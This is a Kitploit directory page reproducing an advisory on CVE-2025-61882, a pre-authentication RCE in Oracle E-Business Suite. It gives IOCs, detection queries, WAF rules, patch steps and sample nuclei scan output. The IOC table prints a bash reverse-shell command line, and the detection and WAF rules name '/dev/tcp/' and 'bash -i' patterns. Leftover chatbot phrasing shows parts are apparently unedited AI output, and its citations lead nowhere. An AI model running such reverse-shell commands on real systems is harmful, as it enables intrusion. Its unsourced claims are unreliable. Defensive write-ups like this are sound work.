Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Blackash-CVE-2025-61882 — Proporciona un aviso detallado de CVE-2025-61882 con análisis técnico, IOCs, consultas de detección y una plantilla de exploit basada en nuclei para RCE sin autenticación previa en Oracle E-Business Suite. | Kitploit
Herramientas/GitHubGitHub/222dff-afk/blackash-cve-2025-61882
Análisis de VulnerabilidadesExplotaciónSeguridad WebPruebas de PenetraciónInteligencia de AmenazasRespuesta a Incidentes
GitHub222dff-afk/blackash-cve-2025-61882

Blackash-CVE-2025-61882

Proporciona un aviso detallado de CVE-2025-61882 con análisis técnico, IOCs, consultas de detección y una plantilla de exploit basada en nuclei para RCE sin autenticación previa en Oracle E-Business Suite.

Ver Repositorio
2hace 10 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

🛡️🚨 CVE‑2025‑61882 — Ejecución Remota de Código Crítica Pre‑Autenticación en Oracle E‑Business Suite (EBS) 🚨🛡️

Resumen breve: Ejecución remota de código crítica pre‑autenticación en Oracle E‑Business Suite (EBS) — afecta a 12.2.3 → 12.2.14, CVSS 9.8, explotada activamente en el mundo real (se ha informado de actividad de ransomware/extorsión). ([oracle.com][1])


📌 Datos rápidos (tabla)

CampoDetalles
🆔 CVECVE‑2025‑61882
🧾 Producto / ComponenteOracle E‑Business Suite (EBS) — integración de Concurrent Processing / BI Publisher
📦 Versiones afectadas12.2.3 → 12.2.14
🔢 CVSS (v3.1)9.8 (AV:N/AC:L/PR:N/UI:N/C:H/I:H/A:H)
⚠️ TipoEjecución Remota de Código (RCE) — no se requiere autenticación
🔥 Explotada en el mundo realSí — se ha informado de campañas de explotación masiva / extorsión
📅 Divulgación / cronologíaOctubre de 2025 (aviso del proveedor + análisis públicos). ([oracle.com][1])

(Lo anterior consolidado a partir del aviso del proveedor, NVD/CISA y múltiples análisis de proveedores.) ([oracle.com][1])


💥 Impacto (tabla)

Área de impactoQué significa
🔓 ConfidencialidadLos atacantes pueden leer datos sensibles de RR. HH., finanzas y ERP
🛠️ IntegridadLos atacantes pueden modificar registros, crear puertas traseras o alterar configuraciones
⚡ DisponibilidadLos atacantes pueden interrumpir servicios, ejecutar ransomware o destruir copias de seguridad
🧭 Nivel de riesgoExtremo — RCE pre‑autenticación en un sistema ERP crítico → posible pivote completo de dominio

Referencias que informan de explotación de alto impacto y vínculos con ransomware. ([Rapid7][2])


🛠️ Resumen técnico (conciso)

  • Vector: Las peticiones HTTP/HTTPS a endpoints web expuestos de EBS desencadenan una cadena de vulnerabilidades en la integración de Concurrent Processing / BI Publisher que conduce a la ejecución remota de código. ([oracle.com][1])
  • Complejidad: Baja (sin autenticación, sin interacción del usuario). ([nvd.nist.gov][3])
  • Payloads observados: patrones de reverse shell, web shells, scripts colocados utilizados para la exfiltración de datos y la extorsión. ([Rapid7][2])

🕵️‍♀️ Indicadores de Compromiso (IOCs) — ejemplos (tabla)

Oracle y los equipos de respuesta a incidentes publicaron IOCs; a continuación se muestran ejemplos representativos informados en avisos y análisis de proveedores. Busque estos patrones en registros y endpoints. ([oracle.com][1])

TipoEjemplo
🌐 IPs (observadas)200.107.207.26, 185.181.60.11 (direcciones de ejemplo informadas)
🧾 Patrón de comandosh -c /bin/bash -i >& /dev/tcp/<ip>/<port> 0>&1 (reverse shell)
🗂️ Hashes de archivosVarios hashes SHA‑256 para scripts de explotación sospechosos (consulte el aviso del proveedor para la lista completa)
🕳️ ArtefactosWeb shells inesperados, nuevos cronjobs, conexiones salientes sospechosas a IPs/puertos inusuales

Si desea la lista completa de IOCs (IPs, hashes completos, nombres de archivo), puedo pegarla aquí — diga “pegar IOCs”. (Sin enlaces.)


🧭 Cronología (compacta)

FechaEvento
9 de agosto de 2025Primera actividad de explotación en el mundo real informada (telemetría del proveedor). ([crowdstrike.com][4])
Principios de octubre de 2025Oracle emitió una alerta de seguridad / disponibilidad de parche para EBS. ([oracle.com][1])
6–7 de octubre de 2025CISA añadió el CVE a su catálogo de Vulnerabilidades Explotadas Conocidas (KEV) (orientación para agencias federales, fecha límite para la mitigación). ([cisa.gov][5])
Octubre de 2025 (en curso)Múltiples análisis de proveedores e informes de explotación masiva (CrowdStrike, Rapid7, Tenable, etc.). ([crowdstrike.com][4])

✅ Acciones recomendadas inmediatas (tabla de pasos)

PrioridadAcciónNotas / Especificaciones de ejemplo
1️⃣ CríticaParchear las instancias de EBS afectadasAplique los parches de la Alerta de Seguridad de Oracle para las versiones 12.2.3–12.2.14 inmediatamente. ([oracle.com][1])
2️⃣ AltaAislar / restringir el acceso a los endpoints web de EBSBloquee HTTP/HTTPS de cara a Internet hacia EBS; permita solo IPs de administración de confianza o VPN.
3️⃣ AltaHabilitar/ajustar reglas WAFImplemente firmas WAF de proveedores/comunidad para los patrones de explotación; bloquee payloads sospechosos. ([Rapid7][2])
4️⃣ AltaBuscar y detectarBusque en los registros comandos de reverse shell, escrituras de archivos anómalas y conexiones salientes hacia IOCs.
5️⃣ IncidenteContener y responder si se encuentra compromisoAísle el host, conserve la evidencia forense, cambie las credenciales, reconstruya desde copias de seguridad limpias.
6️⃣ PolíticaInformar y notificarSi está sujeto a requisitos normativos/contractuales, notifique a las partes interesadas y a las autoridades según la política (la orientación de CISA/KEV puede aplicar). ([nvd.nist.gov][3])

💀 Exploits :

root@kitploit:~
┌──(kali㉿kali)-[~]
└─$ nuclei -u http://10.10.10.10:8000 -t CVE-2025-61882.yaml                                                                                                  

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.4.10

                projectdiscovery.io

[INF] Current nuclei version: v3.4.10 (latest)
[INF] Current nuclei-templates version: v10.2.9 (latest)
[INF] New templates added in latest release: 182
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[CVE-2025-61882:last_modified_date] [http] [critical] http://10.10.10.10:8000 ["Wed, 20 Aug 2025 08:20:09 GMT"]
[INF] Scan completed in 485.722955ms. 1 matches found.
                                                                                                                                                                                                                                           
┌──(kali㉿kali)-[~]
└─$ nuclei -l targets.txt -t CVE-2025-61882.yaml                        

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.4.10

                projectdiscovery.io

[INF] Current nuclei version: v3.4.10 (latest)
[INF] Current nuclei-templates version: v10.2.9 (latest)
[INF] New templates added in latest release: 182
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 7
[INF] Running httpx on input host
[INF] Found 7 URL from httpx
[CVE-2025-61882:last_modified_date] [http] [critical] http://10.10.10.10:8000 ["Mon, 02 Oct 2023 13:57:20 GMT"]
[CVE-2025-61882:last_modified_date] [http] [critical] http://10.10.10.10:8000 ["Wed, 20 Aug 2025 08:20:09 GMT"]
[CVE-2025-61882:last_modified_date] [http] [critical] http://10.10.10.10:8000 ["Sat, 31 Aug 2024 15:30:07 GMT"]
[CVE-2025-61882:last_modified_date] [http] [critical] http://10.10.10.10:8000 ["Tue, 15 Aug 2023 16:58:09 GMT"]
[CVE-2025-61882:last_modified_date] [http] [critical] http://10.10.10.10:8000 ["Fri, 30 Aug 2024 21:49:46 GMT"]
[CVE-2025-61882:last_modified_date] [http] [critical] http://10.10.10.10:8000 ["Sun, 16 May 2021 17:03:44 GMT"]
[CVE-2025-61882:last_modified_date] [http] [critical] http:/10.10.10.10:8000 ["Fri, 01 Sep 2023 13:20:35 GMT"]
[INF] Scan completed in 621.029991ms. 7 matches found.
CVE-2025-61882 Oracle E-Business Suite 1
CVE-2025-61882 Oracle E-Business Suite 4

🕵️‍♂️ Consultas de detección de ejemplo (fáciles de copiar/pegar)

Splunk (búsqueda del patrón de reverse shell):

root@kitploit:~
index=web OR index=ebs_logs (uri_path="/cgi/*" OR uri_path="/xmlpserver/*") 
| search "* /bin/bash -i * /dev/tcp/*" OR "*/dev/tcp/* 0>&1*"
| table _time host src_ip user uri_path _raw

ELK / Kibana (KQL):

root@kitploit:~
http.request.body : "*bash -i*" or http.request.body : "* /dev/tcp/*"

Regla Sigma (conceptual):

root@kitploit:~
title: Oracle EBS Reverse Shell via HTTP
detection:
  selection:
    EventID: 1234
    ProcessCommandLine|contains: "/dev/tcp/"
  condition: selection

(Ajuste los nombres de los campos a su esquema de registros; use los IOCs para refinar.)


🔐 Mitigaciones de ejemplo para firewall / WAF (ejemplos)

  • ACL de red: Bloquee el 80/443 entrante hacia los servidores EBS desde Internet público; permita solo la VPN de gestión e IPs de administración específicas.
  • Regla WAF (pseudo): Bloquee peticiones que contengan bash -i, /dev/tcp/, base64 -d o patrones típicos de payloads de explotación en cuerpos POST o parámetros de URL.
  • Limitación de velocidad / geo‑bloqueo: Limite temporalmente la tasa de peticiones a los endpoints de EBS y bloquee el tráfico de geografías maliciosas conocidas si es coherente con las necesidades del negocio.

🧾 Lista de verificación de parcheo (rápida)

  1. Realice copias de seguridad y snapshots de las imágenes de las VMs ✅
  2. Pruebe el parche en un entorno de staging (si es posible) ✅
  3. Aplique el parche de la Alerta de Seguridad de Oracle a EBS 12.2.3–12.2.14 ✅ (siga los pasos del proveedor: detener servicios, aplicar el parche, ejecutar tareas posteriores a la instalación) ([oracle.com][1])
  4. Reinicie y valide el estado de salud del servicio ✅
  5. Vuelva a escanear en busca de artefactos de compromiso y realice comprobaciones forenses completas del host ✅

🧠 Notas sobre el actor de amenaza / explotación

  • Múltiples proveedores atribuyen la explotación activa a grupos vinculados con la extorsión/ransomware (p. ej., Cl0p / Graceful Spider o actores relacionados) — utilizada para el robo de datos y la extorsión. La confianza en la atribución varía según el proveedor. ([crowdstrike.com][4])

📋 Para equipos de SOC / IR — lista de verificación de playbook

  • Triaje: ¿Intento de explotación entrante? Capture la petición HTTP, las cabeceras y el cuerpo POST.
  • Contención: Aísle la red del host afectado.
  • Forense: Recolecte memoria, imagen de disco, registros del servidor web y registros de auditoría.
  • Remediación: Reconstruya el host desde una imagen limpia si se confirma el compromiso.
  • Recuperación: Restaure desde copias de seguridad conocidas como buenas; rote las credenciales.
  • Informe: Registre el incidente, notifique a las partes interesadas y cumpla con la orientación de KEV/CISA si corresponde. ([nvd.nist.gov][3])

🔎 Fuentes (lista breve de informes autorizados)

(Enumero las fuentes para mayor precisión — no pegaré enlaces aquí, pero estos son los nombres de proveedores/autoridades para que pueda consultarlos si es necesario.)

  • Alerta de Seguridad / Disponibilidad de Parche de Oracle (aviso del proveedor). ([oracle.com][1])
  • NVD / CISA (entrada del catálogo KEV de CISA y metadatos de NVD). ([nvd.nist.gov][3])
  • Informe técnico de CrowdStrike sobre las campañas. ([crowdstrike.com][4])
  • Análisis y preguntas frecuentes de Rapid7 / Tenable / otros proveedores. ([Rapid7][2])

Aquí tiene un aviso legal profesional con emojis que puede usar para su informe sobre CVE‑2025‑61882:


⚠️💀 Aviso legal 💀⚠️

La información proporcionada en este informe es solo con fines de concienciación, defensa y educación. El uso de esta información para explotar, atacar o comprometer cualquier sistema sin autorización explícita es ilegal y puede dar lugar a sanciones penales y civiles.

🔒 Aplique siempre los parches recomendados, siga las mejores prácticas de seguridad y realice pruebas únicamente en entornos controlados.

🧾 Este informe no sustituye los avisos oficiales del proveedor — consulte siempre las Alertas de Seguridad de Oracle y la orientación autorizada para obtener instrucciones definitivas de remediación.

Descargar herramienta